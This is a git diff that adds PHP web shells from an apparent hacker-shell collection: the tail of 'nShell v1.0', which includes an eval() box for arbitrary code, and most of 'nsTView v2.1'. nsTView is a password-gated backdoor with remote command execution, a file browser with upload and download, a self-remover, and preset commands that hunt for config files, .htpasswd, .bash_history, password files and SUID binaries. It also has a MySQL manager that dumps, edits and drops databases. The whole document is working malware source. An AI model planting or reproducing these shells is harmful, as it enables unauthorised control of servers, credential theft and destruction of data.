+function exe_w($query)
+{
+echo "<b><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the show gi duoc het !");
+if(eregi("fields",$query)) {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+echo "<b><font color=red>".$row['Field']." :</font></	b> ".$row['Type'];
+echo "<br>";
+}
+} else {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+   while(list($key,$value)=each($row))
+{
+	echo "<font color=red><b>".$value."</b><font>";
+}
+echo "<br>";
+}
+}
+}
+function exe_s($query)
+{
+$arrstr=@array();$i=0;
+$arrstr=explode(" ",$query);
+$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
+while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
+$i++;
+$arrstr[$i]=$find_row['Field'];
+}
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the select gi duoc het !");
+$row=@mysql_num_rows($result);
+}
+function sql($string)
+{
+$arr=@array();
+$arr=explode(";",$string);
+for($i=0;$i<=count($arr);$i++)
+	{
+	$check_u=eregi("update",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_e=eregi("use",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
+	$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
+	$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
+    $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
+	}
+}
+//=====xong phan function cho sql
+// Sql query
+if($act=="sql")
+{
+	 if(isset($_GET['srname'])&&isset($_GET['pass']))
+	{
+	 echo $_GET['srname'];
+if(!isset($_GET['srname'])) 	$servername=$_GET['srname'];
+   else $servername="localhost";
+$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
+$form2="<center><form method=post  action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
+echo $form2;
+$str=@$_POST['str'];
+if(isset($str)) sql($str);
+	}
+	else {
+		echo "chao";
+		$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text  size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
+        echo $form1;
+             }
+}
+?>
+
+<?php
+if($act=="eval"){
+$script=$_POST['script'];
+if(!$script){
+echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
+}else{
+eval($script);
+}
+}
+?>
+</td>
+</table>
+
+<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
+</center>
+</body>
+
+
+ 
diff --git a/xakep-shells/PHP/nst.php.php.txt b/xakep-shells/PHP/nst.php.php.txt
new file mode 100644
index 0000000..48dc6e5
--- /dev/null
+++ b/xakep-shells/PHP/nst.php.php.txt
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst666";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
